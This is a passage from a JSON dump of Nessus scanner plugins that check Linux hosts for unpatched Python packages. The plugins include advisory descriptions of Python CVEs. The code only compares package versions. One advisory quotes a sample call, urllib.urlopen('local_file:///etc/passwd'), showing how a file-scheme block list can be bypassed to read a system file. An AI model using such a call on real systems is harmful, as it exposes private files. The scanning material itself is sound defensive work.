script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.0.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-19T16:08:25", "description": "The remote host is affected by the vulnerability described in GLSA-201503-10 (Python: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A context-dependent attacker may be able to execute arbitrary code or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-03-24T00:00:00", "type": "nessus", "title": "GLSA-201503-10 : Python: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-7338", "CVE-2014-1912", "CVE-2014-2667", "CVE-2014-4616", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:python", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201503-10.NASL", "href": "https://www.tenable.com/plugins/nessus/82009", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201503-10.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82009);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_xref(name:\"GLSA\", value:\"201503-10\");\n\n script_name(english:\"GLSA-201503-10 : Python: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201503-10\n(Python: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Python. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A context-dependent attacker may be able to execute arbitrary code or\n cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201503-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Python 3.3 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/python-3.3.5-r1'\n All Python 2.7 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/python-2.7.9-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/python\", unaffected:make_list(\"ge 3.3.5-r1\", \"ge 2.7.9-r1\"), vulnerable:make_list(\"lt 3.3.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Python\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:32", "description": "Updated python packages fix security vulnerabilities :\n\nA vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThis updates the python package to version 2.7.6, which fixes several other bugs, including denial of service flaws due to unbound readline() calls in the ftplib and nntplib modules (CVE-2013-1752).\n\nDenial of service flaws due to unbound readline() calls in the imaplib, poplib, and smtplib modules (CVE-2013-1752).\n\nA gzip bomb and unbound read denial of service flaw in python XMLRPC library (CVE-2013-1753).\n\nPython are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root (CVE-2014-4650).\n\nPython before 2.7.8 is vulnerable to an integer overflow in the buffer type (CVE-2014-7185).\n\nWhen Python's standard library HTTP clients (httplib, urllib, urllib2, xmlrpclib) are used to access resources with HTTPS, by default the certificate is not checked against any trust store, nor is the hostname in the certificate checked against the requested host. It was possible to configure a trust root to be checked against, however there were no faculties for hostname checking (CVE-2014-9365).\n\nThe python-pip and tix packages was added due to missing build dependencies.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : python (MDVSA-2015:075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64python-devel", "p-cpe:/a:mandriva:linux:lib64python2.7", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python-pip", "p-cpe:/a:mandriva:linux:python3-pip", "p-cpe:/a:mandriva:linux:tix", "p-cpe:/a:mandriva:linux:tix-devel", "p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:tkinter-apps", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-075.NASL", "href": "https://www.tenable.com/plugins/nessus/82328", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:075. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82328);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-1912\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_xref(name:\"MDVSA\", value:\"2015:075\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2015:075)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages fix security vulnerabilities :\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThis updates the python package to version 2.7.6, which fixes several\nother bugs, including denial of service flaws due to unbound\nreadline() calls in the ftplib and nntplib modules (CVE-2013-1752).\n\nDenial of service flaws due to unbound readline() calls in the\nimaplib, poplib, and smtplib modules (CVE-2013-1752).\n\nA gzip bomb and unbound read denial of service flaw in python XMLRPC\nlibrary (CVE-2013-1753).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\n\nPython before 2.7.8 is vulnerable to an integer overflow in the buffer\ntype (CVE-2014-7185).\n\nWhen Python's standard library HTTP clients (httplib, urllib, urllib2,\nxmlrpclib) are used to access resources with HTTPS, by default the\ncertificate is not checked against any trust store, nor is the\nhostname in the certificate checked against the requested host. It was\npossible to configure a trust root to be checked against, however\nthere were no faculties for hostname checking (CVE-2014-9365).\n\nThe python-pip and tix packages was added due to missing build\ndependencies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0139.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0399.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-pip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-pip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python-docs-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python-pip-1.4.1-4.2.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python3-pip-1.4.1-4.2.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tix-8.4.3-9.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tix-devel-8.4.3-9.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.9-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:22:33", "description": "According to the versions of the python packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that Python's smtplib library did not return an exception when StartTLS failed to be established in the SMTP.starttls() function. A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer.(CVE-2016-0772)\n\n - A vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later 'import' statement could cause a heap overflow, leading to arbitrary code execution.(CVE-2016-5636)\n\n - A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.(CVE-2016-2183)\n\n - The Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers.\n A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data.(CVE-2014-9365)\n\n - An integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.(CVE-2014-7185)\n\n - A flaw was found in the way catastrophic backtracking was implemented in python's pop3lib's apop() method. An attacker could use this flaw to cause denial of service.(CVE-2018-1060)\n\n - The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.(CVE-2013-4238)\n\n - It was found that the Python's httplib library (used by urllib, urllib2 and others) did not properly check HTTPConnection.putheader() function arguments. An attacker could use this flaw to inject additional headers in a Python application that allowed user provided header names or values.(CVE-2016-5699)\n\n - CPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)(CVE-2017-1000158)\n\n - A flaw was found in the way catastrophic backtracking was implemented in python's difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.(CVE-2018-1061)\n\n - It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.(CVE-2013-1752)\n\n - A flaw was found in the way the json module handled negative index argument passed to certain functions (such as raw_decode()). An attacker able to control index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory.(CVE-2014-4616)\n\n - urllib in Python 2.x through 2.7.16 supports the local_file: scheme, which makes it easier for remote attackers to bypass protection mechanisms that blacklist file: URIs, as demonstrated by triggering a urllib.urlopen('local_file:///etc/passwd') call.(CVE-2019-9948)\n\n - Python's elementtree C accelerator failed to initialise Expat's hash salt during initialization. This could make it easy to conduct denial of service attacks against Expat by contructing an XML document that would cause pathological hash collisions in Expat's internal data structures, consuming large amounts CPU and RAM.(CVE-2018-14647)\n\n - A null pointer dereference vulnerability was found in the certificate parsing code in Python. This causes a denial of service to applications when parsing specially crafted certificates. This vulnerability is unlikely to be triggered if application enables SSL/TLS certificate validation and accepts certificates only from trusted root certificate authorities.(CVE-2019-5010)\n\n - Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization.\n The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.(CVE-2019-9636)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : python (EulerOS-SA-2019-1434)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-4238", "CVE-2014-4616", "CVE-2014-7185", "CVE-2014-9365", "CVE-2016-0772", "CVE-2016-2183", "CVE-2016-5636", "CVE-2016-5699", "CVE-2017-1000158", "CVE-2018-1060", "CVE-2018-1061", "CVE-2018-14647", "CVE-2019-5010", "CVE-2019-9636", "CVE-2019-9948"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:python", "p-cpe:/a:huawei:euleros:python-devel", "p-cpe:/a:huawei:euleros:python-libs", "p-cpe:/a:huawei:euleros:python-tools", "p-cpe:/a:huawei:euleros:tkinter", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1434.NASL", "href": "https://www.tenable.com/plugins/nessus/124937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124937);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-1752\",\n \"CVE-2013-4238\",\n \"CVE-2014-4616\",\n \"CVE-2014-7185\",\n \"CVE-2014-9365\",\n \"CVE-2016-0772\",\n \"CVE-2016-2183\",\n \"CVE-2016-5636\",\n \"CVE-2016-5699\",\n \"CVE-2017-1000158\",\n \"CVE-2018-1060\",\n \"CVE-2018-1061\",\n \"CVE-2018-14647\",\n \"CVE-2019-5010\",\n \"CVE-2019-9636\",\n \"CVE-2019-9948\"\n );\n script_bugtraq_id(\n 61738,\n 63804,\n 68119,\n 70089,\n 71639\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : python (EulerOS-SA-2019-1434)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the python packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - It was found that Python's smtplib library did not\n return an exception when StartTLS failed to be\n established in the SMTP.starttls() function. A man in\n the middle attacker could strip out the STARTTLS\n command without generating an exception on the Python\n SMTP client application, preventing the establishment\n of the TLS layer.(CVE-2016-0772)\n\n - A vulnerability was discovered in Python, in the\n built-in zipimporter. A specially crafted zip file\n placed in a module path such that it would be loaded by\n a later 'import' statement could cause a heap overflow,\n leading to arbitrary code execution.(CVE-2016-5636)\n\n - A flaw was found in the way the DES/3DES cipher was\n used as part of the TLS/SSL protocol. A\n man-in-the-middle attacker could use this flaw to\n recover some plaintext data by capturing large amounts\n of encrypted traffic between TLS/SSL server and client\n if the communication used a DES/3DES based\n ciphersuite.(CVE-2016-2183)\n\n - The Python standard library HTTP client modules (such\n as httplib or urllib) did not perform verification of\n TLS/SSL certificates when connecting to HTTPS servers.\n A man-in-the-middle attacker could use this flaw to\n hijack connections and eavesdrop or modify transferred\n data.(CVE-2014-9365)\n\n - An integer overflow flaw was found in the way the\n buffer() function handled its offset and size\n arguments. An attacker able to control those arguments\n could use this flaw to disclose portions of the\n application memory or cause it to crash.(CVE-2014-7185)\n\n - A flaw was found in the way catastrophic backtracking\n was implemented in python's pop3lib's apop() method. An\n attacker could use this flaw to cause denial of\n service.(CVE-2018-1060)\n\n - The ssl.match_hostname function in the SSL module in\n Python 2.6 through 3.4 does not properly handle a '\\\\0'\n character in a domain name in the Subject Alternative\n Name field of an X.509 certificate, which allows\n man-in-the-middle attackers to spoof arbitrary SSL\n servers via a crafted certificate issued by a\n legitimate Certification Authority, a related issue to\n CVE-2009-2408.(CVE-2013-4238)\n\n - It was found that the Python's httplib library (used by\n urllib, urllib2 and others) did not properly check\n HTTPConnection.putheader() function arguments. An\n attacker could use this flaw to inject additional\n headers in a Python application that allowed user\n provided header names or values.(CVE-2016-5699)\n\n - CPython (aka Python) up to 2.7.13 is vulnerable to an\n integer overflow in the PyString_DecodeEscape function\n in stringobject.c, resulting in heap-based buffer\n overflow (and possible arbitrary code\n execution)(CVE-2017-1000158)\n\n - A flaw was found in the way catastrophic backtracking\n was implemented in python's difflib.IS_LINE_JUNK\n method. An attacker could use this flaw to cause denial\n of service.(CVE-2018-1061)\n\n - It was discovered that multiple Python standard library\n modules implementing network protocols (such as httplib\n or smtplib) failed to restrict sizes of server\n responses. A malicious server could cause a client\n using one of the affected modules to consume an\n excessive amount of memory.(CVE-2013-1752)\n\n - A flaw was found in the way the json module handled\n negative index argument passed to certain functions\n (such as raw_decode()). An attacker able to control\n index value passed to one of the affected functions\n could possibly use this flaw to disclose portions of\n the application memory.(CVE-2014-4616)\n\n - urllib in Python 2.x through 2.7.16 supports the\n local_file: scheme, which makes it easier for remote\n attackers to bypass protection mechanisms that\n blacklist file: URIs, as demonstrated by triggering a\n urllib.urlopen('local_file:///etc/passwd')\n call.(CVE-2019-9948)\n\n - Python's elementtree C accelerator failed to initialise\n Expat's hash salt during initialization. This could\n make it easy to conduct denial of service attacks\n against Expat by contructing an XML document that would\n cause pathological hash collisions in Expat's internal\n data structures, consuming large amounts CPU and\n RAM.(CVE-2018-14647)\n\n - A null pointer dereference vulnerability was found in\n the certificate parsing code in Python. This causes a\n denial of service to applications when parsing\n specially crafted certificates. This vulnerability is\n unlikely to be triggered if application enables SSL/TLS\n certificate validation and accepts certificates only\n from trusted root certificate\n authorities.(CVE-2019-5010)\n\n - Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is\n affected by: Improper Handling of Unicode Encoding\n (with an incorrect netloc) during NFKC normalization.\n The impact is: Information disclosure 